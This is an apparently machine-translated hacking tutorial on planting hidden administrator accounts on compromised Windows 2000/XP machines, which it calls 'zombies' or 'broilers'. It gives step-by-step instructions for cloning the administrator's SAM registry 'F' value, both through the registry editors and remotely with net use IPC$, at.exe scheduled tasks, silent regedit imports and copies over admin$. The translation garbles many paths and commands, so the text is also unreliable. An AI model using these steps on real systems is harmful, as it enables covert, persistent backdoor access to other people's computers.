1. How to create hidden superusers on the graphic interface
The graphic interface is applicable to bots running local or 3389 Terminal Services. The author I mentioned has a good idea, but it is better to use psu.exe (ProgramIf you want to upload psu.exe to a program running with the System user ID. In my opinion, this deployment will be applied to the psu.exe program. Because Windows2000 has two registry Editors: regedit.exeand regedt32.exe. In XP, regedit.exeand regedt32.exe are actually a program. You can right-click "permission" to modify the key value permission. Regedt32.exe can be used to set permissions for registry keys. NT/2000/users set the Sam key to "Full Control" for me. In this way, you can read and write the information in the SAM key. The steps are as follows:
1. Assume that we log on to a zombie with terminal services as a Super User administrator. First, create an account under the command line or account manager: hacker $, here I create this account under the command line
Net user hacker $1234/Add
2. Enter regedt32.exein the "Start/Run" command to run regedt32.exe.
3. Click "permission" and a window will pop up.
Click Add to add the account I logged on to the security bar. Here I log on as administrator, So I add the Administrator and set the permission to "full control ". Note: It is best to add the account you are logged on to or the group in which the account is located. do not modify the original account or group. Otherwise, a series of unnecessary problems may occur. And then click here to delete the account you added.
4. Then, click "start", click "run", and enter "regedit.exe.exe" to start the Registration Table Editor "regedit.exe. Open key:
Hkey_local_maichinesamsamdomainsaccountusernameshacker $"
5. Export the items hacker $, 00000409, and 000001f4 as hacker. reg, 409.reg, 1f4. reg. use NotePad to edit the exported files respectively, and copy the value of the key "F" under the "000001f4" of the Super User, overwrite the value of the key "F" under item 00000409 corresponding to hacker $, and then set the value to 00000409. reg and hacker. reg merge.
6. Execute net user hacker $/del on the command line to delete user hacker $:
Net user hacker $/del
7. In the regedit.exe window, press F5 to refresh, and then press file-import registry file to import modified hacker. reg to registry.
The hacker of the hidden Super User has been created. Then, disable regedit.exe. In the regedt32.exe window, change the hkey_local_machinesamsam Key Permission to the original one (you only need to delete the added account administrator ).
9. Note: After a hidden superuser is created, the hacker $ user cannot be seen in the account manager, and the hacker $ user cannot be seen in the command line by running the "Net user" command, but after the superuser is created, you cannot change the password any more. If you use the net user command to change the password of hacker $, you will be able to see this hidden super user in the account manager and cannot delete it.
2. How to remotely create hidden superusers under the command line
Here, we will use the command of "at.exe", because the scheduled task of "atsag" is to run with the System ID, and the psu.exe program will not be used. The method is also acceptable, as long as the Schedule service can be started.
For the command line method, you can use a variety of connection methods, such as using sqlexec to connect to port 1433 of MSSQL, or using Telnet service, as long as you can get a mongoshell, you can also run the AT command.
1. First, find a zombie. How to find it is not the topic I mentioned here. Assume that a super user with the administrator password and 12345678 is found. Now we can remotely create a hidden super user for the Super User under the command line. (In this example, the host is a host in my lan. I changed its IP address to 13.50.97.238. Do not block the host on the Internet to avoid disturbing the normal IP address .)
2. first establish a connection with the broiler. The command is: net use 13.50.97.238ipc $ "12345678"/User: "Administrator
3. Create a user on the chicken with the atcommand (if the atservice is not started, use netsvc.exeor SC .exe of Xiaoyi to start it remotely ):
At 13.50.97.238 c: \ winntsystem32net.exe user hacker $1234/Add
Create the username with the $ character because after the $ character is added, the user is not displayed with the net user in the command line, but can be seen in the account manager.
4. Use the AT command to export the hkey_local_machinesamsamdomainsaccountusers key values:
At 13.50.97.238 :55 c: \ winntregedit.exe/e hacker. Reg
Hkey_local_machinesamsamdomainsaccountusers
/E is the parameter of regedit.exe. The key in _ local_machinesamsamdomainsaccountusers must end. If necessary, you can quote "C: \ winntregedit.exe/e hacker. Reg hkey_local_machinesamsamdomainsaccountusers" in quotation marks.
5. Download hacker. Reg from the bot to the local machine and use NotePad to open the edit command:
Copy 13.50.97.238admin $ system32hacker. Reg C: \ hacker. Reg
The graphic field of the modification method has already been introduced. I will not introduce it here.
6. Copy the edited hacker. Reg back to the zombie.
Copy c: \ hacker. Reg 13.50.97.238admin $ system32hacker1. Reg
7. view the zombie time: Net time 13.50.97.238 and then run the AT command to delete the user hacker $:
At 13.50.97.238 13:40 net user hacker $/del
8. Verify whether hacker $ is deleted: Use
Net use 13.50.97.238/del disconnect the bot.
Net use 13.50.97.238ipc $ "1234"/User: "hacker $" Use the account hacker $ to connect to a zombie. If the connection fails, the connection is deleted.
9. Establish a connection with the zombie: net use 13.50.97.238ipc $ "12345678"/User: "Administrator" and then get the zombie time. Run the AT command to copy the hacker1.reg copy back to the zombie and import it to the zombie registry:
At 13.50.97.238 13:41 C: winntregedit.exe/s hacker1.reg
The parameter/s of regedit.exe indicates quiet mode.
10. Verify that hacker $ has been created. The method is the same as that for verifying that hacker $ is deleted.
11. Verify whether hacker $ has the read, write, and delete permissions. If you are not at ease, you can also verify whether other accounts can be created.
12. We can conclude through 11 that the user hacker $ has the superuser permission, because it was a common user when I used the AT command to create it, but now it has the permission to read, write, and delete data remotely.